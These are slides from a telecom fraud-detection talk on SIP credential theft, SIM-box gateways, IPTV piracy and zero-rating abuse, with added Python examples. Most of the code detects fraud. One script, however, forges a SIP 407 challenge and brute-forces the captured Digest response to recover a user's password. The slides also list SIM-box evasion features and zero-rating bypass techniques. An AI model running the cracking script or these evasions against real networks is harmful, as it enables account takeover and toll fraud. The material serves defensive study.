PEDRO FIDALGO, WEDO TECHNOLOGIES DAN DEETH, SANDVINE
• FRAUD OVER IP.
• KNOW YOUR ENEMY.
• SIP FRAUD CHALLENGES
• IPTV FRAUD
• ZERO RATED FRAUD
• ADVANCED FRAUD DETECTION IN IP
• MIGRATION FROM CIRCUIT-SWITCHED TO IP NETWORKS, SIP, LTE.
• FRAUD DETECTION AND INTRUSION DETECTION HAVE TRADITIONALLY BEEN COMPLETELY SEPARATE RESEARCH AREAS.
• MALICIOUS ACTIVITY + POLICY VIOLATIONS + ARTIFICIAL INTELLIGENCE
• Back in 2011, an attacker (or group of attackers) performed an Internet-wide scanning event that was orchestrated by a botnet.
• The probe was a SIP REGISTER request trying to register a dummy user, expecting a 404 Not Found client-failure response from any SIP server listening.
• In less than 12 days they were able to query 4,000,000,000 IP addresses, which equates to practically every IPv4 address on the Internet.
ANTI-FRAUD DETECTION READY
STEALTH CAPABILITIES
• Port Inter-Calling
• Fake Ring-Back
• Proxy Encryption for IP Block
• Dynamic Allocation and Rotation of SIM Cards
• IMEI Change
• Internet Data Simulation
• BTS Change and Lock
• Carrier Selection
• SIM Bank / SIM Server
ANTI BLOCKING
• Accumulated Duration and Calls
• Consecutive Failed, No Answer, Short Duration Calls
FEATURES
• Up to 128 Channels
• GSM/CDMA/WCDMA/LTE Frequencies
• GoIP (SIP and H.323)
• Automatic Recharge
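The "anti-blocking" counters this kind of gateway advertises (accumulated duration and calls, runs of consecutive failed, no-answer and short calls) mirror the per-SIM thresholds an operator's fraud system applies; the gateway's job is to stay under them and rotate the SIM before it is blocked. The following is an added example of the operator-side counters, not the gateway's software and not WeDo's or Sandvine's code. The CDR layout, IMSIs, IMEIs and every threshold in LIMITS are constructed assumptions. It also counts SIMs seen behind one IMEI, the check that the "IMEI Change" and SIM rotation features on the list are meant to defeat.

```python
"""Per-SIM call-pattern counters of the kind a SIM box's 'anti-blocking'
logic tries to stay under: accumulated calls and duration, runs of
consecutive failed / no-answer / short calls, plus an IMEI shared by many SIMs.

Added example, not from the slides. CDR fields, IMSIs, IMEIs and all
thresholds are constructed assumptions for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class CDR:
    imsi: str
    imei: str
    direction: str   # "MO" = mobile originated (outgoing), "MT" = terminated
    peer: str        # number called (MO) or calling (MT)
    result: str      # "answered", "failed", "no_answer"
    duration_s: int  # 0 when the call never connected


# Assumed per-SIM limits for a one-day window (not from the slides).
LIMITS = {
    "max_mo_calls": 30,
    "max_duration_s": 3 * 3600,
    "max_bad_run": 5,          # consecutive failed / no-answer / short calls
    "short_call_s": 15,
    "min_calls_for_ratio": 10,
    "max_distinct_peer_ratio": 0.9,
}


def profile_sim(cdrs: List[CDR]) -> dict:
    """Counters for one IMSI; cdrs must be in chronological order."""
    mo = [c for c in cdrs if c.direction == "MO"]
    mt = [c for c in cdrs if c.direction == "MT"]
    bad_run = longest = 0
    for c in mo:
        is_bad = c.result != "answered" or c.duration_s < LIMITS["short_call_s"]
        bad_run = bad_run + 1 if is_bad else 0
        longest = max(longest, bad_run)
    return {
        "mo_calls": len(mo),
        "mt_calls": len(mt),
        "duration_s": sum(c.duration_s for c in mo),
        "distinct_peer_ratio": (len({c.peer for c in mo}) / len(mo)) if mo else 0.0,
        "max_bad_run": longest,
    }


def flag_sims(cdrs: List[CDR]) -> Dict[str, List[str]]:
    """Return {imsi: [reasons]} for SIMs that cross any assumed limit.
    A gateway's anti-blocking logic rotates the SIM before these trip."""
    by_imsi: Dict[str, List[CDR]] = defaultdict(list)
    for c in cdrs:
        by_imsi[c.imsi].append(c)
    flagged = {}
    for imsi, calls in by_imsi.items():
        p = profile_sim(calls)
        reasons = []
        if p["mo_calls"] > LIMITS["max_mo_calls"]:
            reasons.append("accumulated_calls")
        if p["duration_s"] > LIMITS["max_duration_s"]:
            reasons.append("accumulated_duration")
        if p["max_bad_run"] >= LIMITS["max_bad_run"]:
            reasons.append("consecutive_bad_calls")
        if (p["mo_calls"] >= LIMITS["min_calls_for_ratio"] and p["mt_calls"] == 0
                and p["distinct_peer_ratio"] > LIMITS["max_distinct_peer_ratio"]):
            reasons.append("outgoing_only_to_many_peers")  # real phones get called back
        if reasons:
            flagged[imsi] = reasons
    return flagged


def imeis_with_many_sims(cdrs: List[CDR], min_sims: int = 3) -> Dict[str, int]:
    """SIMs rotated behind one handset identity. Only works while the
    gateway keeps its IMEI; the advertised 'IMEI Change' defeats it."""
    sims_per_imei: Dict[str, set] = defaultdict(set)
    for c in cdrs:
        sims_per_imei[c.imei].add(c.imsi)
    return {imei: len(s) for imei, s in sims_per_imei.items() if len(s) >= min_sims}


def simbox_cdrs(imsi: str, imei: str, n: int = 40) -> List[CDR]:
    """Constructed pattern: outgoing only, a new callee every call, a stretch
    of failed / unanswered attempts in the middle."""
    out = []
    for i in range(n):
        if 10 <= i < 16:
            out.append(CDR(imsi, imei, "MO", f"+1555000{i:04d}",
                           "failed" if i % 2 else "no_answer", 0))
        else:
            out.append(CDR(imsi, imei, "MO", f"+1555000{i:04d}", "answered", 45 + i))
    return out


def normal_cdrs(imsi: str, imei: str) -> List[CDR]:
    """Constructed ordinary subscriber: mixed directions, repeat contacts."""
    return [
        CDR(imsi, imei, "MO", "+15551234567", "answered", 310),
        CDR(imsi, imei, "MT", "+15559876543", "answered", 95),
        CDR(imsi, imei, "MO", "+15551234567", "no_answer", 0),
        CDR(imsi, imei, "MT", "+15551234567", "answered", 620),
        CDR(imsi, imei, "MO", "+15552223333", "answered", 40),
    ]


SAMPLE_CDRS = (normal_cdrs("001010000000001", "IMEI-HANDSET-1")
               + simbox_cdrs("001010000000101", "IMEI-GATEWAY-A")
               + simbox_cdrs("001010000000102", "IMEI-GATEWAY-A")
               + simbox_cdrs("001010000000103", "IMEI-GATEWAY-A"))


if __name__ == "__main__":
    for imsi, why in flag_sims(SAMPLE_CDRS).items():
        print(imsi, why)
    print("IMEIs with many SIMs:", imeis_with_many_sims(SAMPLE_CDRS))
```

The duration limit is deliberately not hit by the constructed gateway traffic: a box that keeps calls short stays under accumulated-duration rules, which is why the consecutive-bad-call run and the outgoing-only pattern matter more than any single total.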
SECURITY
• End-to-end encryption is not ensured, since intermediate SIP servers (proxies) need to examine and change certain fields of the SIP messages.
• The protection that is available covers only a few SIP fields and leaves other important fields (e.g. SDP, From, To) unprotected.
• SIP messages between the SIP server and the user agent travel in clear text unless TLS (SIPS) is used on that hop, so they are vulnerable to MITM.
• User agents are required to authenticate to SIP servers, but SIP servers are not required to authenticate to user agents.
• User agents can be challenged for their credentials. The password itself is not sent: the UA answers with an MD5 digest (RFC 3261 Digest authentication) of username, realm, password, server nonce, method and request URI, which anyone who captures the exchange can attack offline by dictionary or brute force.
SIP VICIOUS
• Port scan for the SIP port (UDP 5060).
• Send a SIP INVITE (ghost call) and hang up.
• Respond with 407 Proxy Authentication Required to the BYE sent by the user agent.
• The user agent retries the BYE carrying the MD5 digest response computed from its password.
• Brute-force the MD5 digest offline to recover the password.
• Authenticate using the compromised credentials.
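The exchange behind the last four steps, and the reason the SECURITY slide's "MD5" is a weakness rather than a protection, as an added example that is not from the slides and not from the SIPVicious tool: the attacker answers the victim's BYE with a 407 challenge, the user agent re-sends the BYE with a Digest response, and everything in that header except the password is known, so each guess costs two MD5 computations. The addresses, realm, nonce, username and the password are constructed for illustration.

```python
"""SIP Digest authentication end to end: the rogue 407 challenge, the user
agent's authenticated BYE, and the offline guess of the password from the
captured response.

Added example, not from the slides or from the SIPVicious tool. Addresses,
realm, nonce, username and password are constructed for illustration.
"""
import hashlib
import itertools
import re
import string
from typing import Iterable, Optional

CRLF = "\r\n"


def md5_hex(data: str) -> str:
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def digest_response(username: str, realm: str, password: str,
                    method: str, uri: str, nonce: str) -> str:
    """RFC 3261 Digest without qop: MD5(HA1 ':' nonce ':' HA2), where
    HA1 = MD5(username:realm:password) and HA2 = MD5(method:uri)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def parse_sip(message: str):
    """Split a SIP message into (start line, {lower-case header: value}, body)."""
    head, _, body = message.partition(CRLF + CRLF)
    start_line, *header_lines = head.split(CRLF)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start_line, headers, body


_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_digest_params(header_value: str) -> dict:
    """'Digest realm="r", nonce="n", algorithm=MD5' -> {'realm': 'r', ...}."""
    scheme, _, params = header_value.partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest header")
    return {k: quoted or bare for k, quoted, bare in _PARAM.findall(params)}


def build_407(realm: str, nonce: str) -> str:
    """What the attacker, posing as the proxy, answers to the victim's BYE."""
    return CRLF.join([
        "SIP/2.0 407 Proxy Authentication Required",
        "Via: SIP/2.0/UDP 198.51.100.20:5060;branch=z9hG4bK-bye1",
        "Call-ID: ghost-call-0001@198.51.100.20",
        "CSeq: 2 BYE",
        f'Proxy-Authenticate: Digest realm="{realm}", nonce="{nonce}", algorithm=MD5',
        "Content-Length: 0",
    ]) + CRLF + CRLF


def ua_answer_challenge(challenge: str, username: str, password: str,
                        request_uri: str) -> str:
    """The victim user agent re-sends its BYE with Proxy-Authorization."""
    _, headers, _ = parse_sip(challenge)
    chal = parse_digest_params(headers["proxy-authenticate"])
    response = digest_response(username, chal["realm"], password,
                               "BYE", request_uri, chal["nonce"])
    authz = (f'Digest username="{username}", realm="{chal["realm"]}", '
             f'nonce="{chal["nonce"]}", uri="{request_uri}", '
             f'response="{response}", algorithm=MD5')
    return CRLF.join([
        f"BYE {request_uri} SIP/2.0",
        "Via: SIP/2.0/UDP 198.51.100.20:5060;branch=z9hG4bK-bye2",
        "Call-ID: ghost-call-0001@198.51.100.20",
        "CSeq: 3 BYE",
        f"Proxy-Authorization: {authz}",
        "Content-Length: 0",
    ]) + CRLF + CRLF


def crack_captured_bye(bye_message: str, wordlist: Iterable[str],
                       pin_digits: int = 4) -> Optional[str]:
    """Attacker side: username, realm, nonce, method and uri are all in the
    captured header, so only the password is unknown. Tries the wordlist,
    then every numeric PIN up to pin_digits long."""
    start_line, headers, _ = parse_sip(bye_message)
    method = start_line.split(" ", 1)[0]
    p = parse_digest_params(headers["proxy-authorization"])
    target = p["response"].lower()
    ha2 = md5_hex(f"{method}:{p['uri']}")  # identical for every candidate

    def matches(candidate: str) -> bool:
        ha1 = md5_hex(f"{p['username']}:{p['realm']}:{candidate}")
        return md5_hex(f"{ha1}:{p['nonce']}:{ha2}") == target

    for word in wordlist:
        if matches(word):
            return word
    for n in range(1, pin_digits + 1):
        for digits in itertools.product(string.digits, repeat=n):
            pin = "".join(digits)
            if matches(pin):
                return pin
    return None


def demo() -> Optional[str]:
    """Rogue 407 -> UA answers -> attacker recovers the (constructed) password."""
    challenge = build_407("sip.example.net", "dcd98b7102dd2f0e8b11d0f600bfb0c093")
    bye = ua_answer_challenge(challenge, "1001", "7412", "sip:attacker@203.0.113.5")
    return crack_captured_bye(bye, ["password", "1001", "secret"])


if __name__ == "__main__":
    print("recovered password:", demo())
```

Nothing here depends on the attacker being on the server: the nonce is the attacker's own, so no rate limiting or lockout on the real proxy is ever triggered, and a four-digit extension PIN falls in a fraction of a second.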
1. Sandvine creates a data record for the selected SIP messages and transmits it to WeDo.
2. WeDo analyzes the data record with RAID FMS and correlates the event with historical records and subscriber information, e.g. customer type, account credit.
3. If WeDo determines that fraud is occurring, it uses the RAID Integrated Case Management automated workflow to drive the CSP through the appropriate next steps.
IPTV FRAUD
1. An unlicensed video provider sells thousands of premium channels on plans from 1 day to 1 year. The service can include IPTV boxes that come already configured.
2. The user subscribes to the illegal IPTV service, or downloads piracy apps to find links to premium video streams.
3. The user receives the content through streaming URLs served from a cloud storage site.
• The digital service provider receives $0 revenue and absorbs the cost of the increased capacity. Streaming runs 24/7 if the IPTV boxes are not turned off.
• 8% of TV users in the U.S. and Canada are piracy users, roughly 9 million users.
• With a 4000 kbps stream, each user will consume 1.1 TB a month.
• Estimated impact: $1.1 billion a year.
• Data records are created identifying users with streaming flows as well as the content providers.
• RAID FMS creates alarms identifying the users streaming illegal services as well as the use of anonymizers to masquerade the traffic.
• RAID FMS integrates all alarms, helping CSPs identify and quantify the total amount involved in fraud as well as the cases with the highest impact in terms of capacity.
• 78.5 billion visits in 2015 to TV and film piracy sites worldwide, 73.7% streaming vs 17.3% direct-download sites (Muso 2015).
ZERO RATED FRAUD
Zero-rating content is part of many CSPs' offers: it allows unlimited data for specific apps, services or websites.
These apps are available in the official store and advertise themselves as tools to "surf the internet privately and securely".
Fraudsters use techniques such as HTTP header injection (e.g. a forged Host header), domain fronting and DNS spoofing to disguise data traffic so that it looks like the free data offer.
Currently there are 283 VPN-like apps in the Google Play store.
Traffic classification, using deterministic or signature techniques, identifies connections to Psiphon servers. A data record is transmitted to WeDo.
CSPs, using the inherent capabilities of Advanced Case Management, are able to determine the most effective actions to reduce the fraud impact.
RAID FMS cross-references the events with historical and behavioral norms, providing additional context to the event.
Alarms can be grouped into multiple categories, giving CSPs a holistic view of the fraud impact and the most employed techniques.
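How the three evasion techniques named above defeat a classifier that trusts names, what a destination check recovers, and why domain fronting still needs the behavioural comparison the slides describe (subscribers consuming far more than the average user), as an added example that is not from the slides and not Sandvine's or WeDo's code. The zero-rated domains, the partner's address range, the list of signature-identified tunnel servers and all flow records are constructed for illustration; Psiphon is the service the slides name, the addresses are not its.

```python
"""Zero-rating classification: a name-only rule that Host-header injection,
spoofed DNS answers and domain fronting all satisfy, a stricter rule that
also checks the destination, and a volume-outlier check for what remains.

Added example, not from the slides. Domains, address ranges, the tunnel
server list and all flow records are constructed for illustration.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional, Tuple

ZERO_RATED_DOMAINS = {"video.example-zero.com", "cdn.example-zero.com"}
# Address space the content partner publishes for its servers (constructed).
ZERO_RATED_PREFIXES = [ip_network("192.0.2.0/24")]
# Servers already identified as anonymizer/tunnel endpoints by signature
# matching (constructed; the slides describe classifying Psiphon servers).
KNOWN_TUNNEL_SERVERS = {"198.51.100.77"}


@dataclass
class Flow:
    subscriber: str
    dst_ip: str
    dst_port: int
    sni: Optional[str]        # TLS ClientHello server_name, if TLS
    http_host: Optional[str]  # Host header, if plaintext HTTP
    dns_name: Optional[str]   # name the subscriber's DNS lookup mapped to dst_ip
    octets: int               # bytes carried by the flow


def naive_is_zero_rated(f: Flow) -> bool:
    """Rule keyed on names only: trusts whatever the client asserts."""
    return bool({f.http_host, f.sni, f.dns_name} & ZERO_RATED_DOMAINS)


def dst_is_partner(ip: str) -> bool:
    return any(ip_address(ip) in net for net in ZERO_RATED_PREFIXES)


def strict_classify(f: Flow) -> str:
    """'zero-rated', 'billable' or 'fraud-suspect:<reason>'."""
    if f.dst_ip in KNOWN_TUNNEL_SERVERS:
        return "fraud-suspect:known-tunnel-server"
    if not naive_is_zero_rated(f):
        return "billable"
    if not dst_is_partner(f.dst_ip):
        # The name claims the free offer but the packets go elsewhere:
        # an injected Host header or a spoofed DNS answer pointing at a proxy.
        return "fraud-suspect:name-destination-mismatch"
    # Domain fronting passes here: SNI and destination are the partner's CDN
    # and the real Host header is inside TLS. Only volume/behaviour catches it.
    return "zero-rated"


def zero_rated_volume_outliers(flows: List[Flow], factor: float = 3.0) -> List[str]:
    """Subscribers whose zero-rated volume exceeds `factor` times the mean of
    all other subscribers (leave-one-out, so one heavy user cannot hide by
    inflating the average it is compared against)."""
    per_sub: Dict[str, int] = {}
    for f in flows:
        if strict_classify(f) == "zero-rated":
            per_sub[f.subscriber] = per_sub.get(f.subscriber, 0) + f.octets
    flagged = []
    for sub, octets in per_sub.items():
        others = [v for s, v in per_sub.items() if s != sub]
        if others and octets > factor * sum(others) / len(others):
            flagged.append(sub)
    return sorted(flagged)


MB = 1_000_000
SAMPLE_FLOWS = [  # constructed records, one per subscriber
    # Legitimate viewers of the zero-rated service
    Flow("alice", "192.0.2.10", 443, "video.example-zero.com", None, "video.example-zero.com", 50 * MB),
    Flow("frank", "192.0.2.11", 443, "video.example-zero.com", None, "video.example-zero.com", 40 * MB),
    Flow("grace", "192.0.2.12", 443, "video.example-zero.com", None, "video.example-zero.com", 60 * MB),
    # Host header injection: plaintext HTTP to a proxy, Host says the free domain
    Flow("bob", "203.0.113.9", 80, None, "video.example-zero.com", None, 900 * MB),
    # DNS spoofing: the app's resolver answered the free name with the proxy's IP
    Flow("carol", "203.0.113.9", 443, None, None, "video.example-zero.com", 700 * MB),
    # Domain fronting: SNI and IP are the partner's CDN edge, inner Host hidden
    Flow("dave", "192.0.2.20", 443, "cdn.example-zero.com", None, "cdn.example-zero.com", 600 * MB),
    # Tunnel to a server already classified by signature
    Flow("erin", "198.51.100.77", 443, "cdn.example-zero.com", None, None, 800 * MB),
]


def classify_all(flows: List[Flow] = SAMPLE_FLOWS) -> Dict[str, Tuple[bool, str]]:
    """{subscriber: (naive verdict, strict verdict)} for one flow per subscriber."""
    return {f.subscriber: (naive_is_zero_rated(f), strict_classify(f)) for f in flows}


if __name__ == "__main__":
    for sub, (naive, strict) in classify_all().items():
        print(f"{sub:6} naive={naive!s:5} strict={strict}")
    print("volume outliers among zero-rated:", zero_rated_volume_outliers(SAMPLE_FLOWS))
```

The naive rule zero-rates all seven flows. The destination check reclassifies the injected-Host and spoofed-DNS cases and the known tunnel server, but the fronted flow is indistinguishable from a real CDN session at this layer and is only surfaced by comparing its volume with the other zero-rated subscribers.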
Subscribers exploiting the zero-
rating of a subscriber portal
consumed 300% more than the
average user, impacting,